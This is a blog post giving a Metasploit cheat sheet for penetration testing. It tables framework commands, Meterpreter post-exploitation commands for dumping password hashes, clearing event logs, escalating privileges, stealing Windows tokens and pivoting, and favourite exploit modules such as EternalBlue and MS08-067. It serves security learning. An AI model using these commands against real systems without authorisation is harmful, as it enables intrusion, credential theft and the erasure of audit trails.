Post

Metasploit Cheat Sheet

Posted
By Lucian Nitescu 3 min read

Image of Metasploit Cheat Sheet

A few months ago I have created a msfvenom cheat sheet without explaining the Metasploit framework, so here it is a brief cheat sheet.

Metasploit is a free tool that has built-in exploits which aids in gaining remote access to a system by exploiting a vulnerability in that server.

General Information

CommandDescription
msfconsoleLaunch program
versionDisplay current version
msfupdatePull the weekly update
makerc <FILE.rc>Saves recent commands to file
msfconsole -r <FILE.rc>Loads a resource file

Executing an Exploit / Scanner / Module

CommandDescription
use <MODULE>Set the exploit to use
set payload <PAYLOAD>Set the payload
show optionsShow all options
set <OPTION> <SETTING>Set a setting
exploit or runExecute the exploit

Session Handling

CommandDescription
sessions -lList all sessions
sessions -i <ID>Interact/attach to session
background or ^ZDetach from session

Using the Database

The DB saves data found during exploitation. Auxiliary scan results, hashdumps, and credentials show up in the DB.

  • First Time Setup (Run from linux command line.)
CommandDescription
service postgresql StartStart DB
msfdb InitInit the DB
  • Inside msfconsole
CommandDescription
db_statusShould say connected
hostsShow hosts in DB
servicesShow ports in DB
vulnsShow all vulns found

Meterpreter Session Commands

The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

CommandDescription
sysinfoShow system info
psShow running processes
kill <PID>Terminate a process
getuidShow your user ID
upload / downloadUpload / download a file
pwd / lpwdPrint working directory (local / remote)
cd / lcdChange directory (local / remote)
catShow contents of a file
edit <FILE>Edit a file (vim)
shellDrop into a shell on the target machine
migrate <PID>Switch to another process
hashdumpShow all pw hashes (Windows only)
idletimeDisplay idle time of user
screenshotTake a screenshot
clearevClear the logs
  • Escalate Privileges
CommandDescription
use privLoad the script
getsystemElevate your privs
getprivsElevate your privs
  • Token Stealing (Windows only)
CommandDescription
use incognitoLoad the script
list_tokens -uShow all tokens
impersonate_tokenDOMAIN\USER Use token
drop_tokenStop using token
  • Network Pivoting
CommandDescription
portfwd [ADD/DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389Enable port forwarding
route add <SUBNET> <MASK>Pivot through a session by adding a route within msf
route add 192.168.0.0/24Pivot through a session by adding a route within msf
route add 192.168.0.0/24 -dDeleting a route within msf

Finding an Exploit / Payload to Use

CommandDescription
search <TERM>Searches all exploits, payloads, and auxiliary modules
show exploitsShow all exploits
show payloadsShow all payloads
show auxiliaryShow all auxiliary modules (like scanners)
show all*

My favorite

CommandDescription
use auxiliary/scanner/smb/smb_enumsharesSMB Share Enumeration
use auxiliary/scanner/smb/smb_ms17_010MS17-010 SMB RCE Detection
use exploit/windows/smb/ms17_010_eternalblueMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
use exploit/windows/smb/ms17_010_psexecMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
use exploit/windows/smb/ms08_067_netapiMS08-067 Microsoft Server Service Relative Path Stack Corruption
use exploit/windows/smb/psexecMicrosoft Windows Authenticated User Code Execution
use exploit/multi/ssh/sshexecSSH User Code Execution (good for using meterpreter)
use post/windows/gather/arp_scannerWindows Gather ARP Scanner
use post/windows/gather/enum_applicationsWindows Gather Installed Application Enumeration
run getgui -eEnables RDP for Windows in meterpreter session

External Resources

cheatsheet, offensive_security
offensive security cheat sheet reverse shell backdoor bash perl python PHP
This post is licensed under CC BY 4.0 by the author.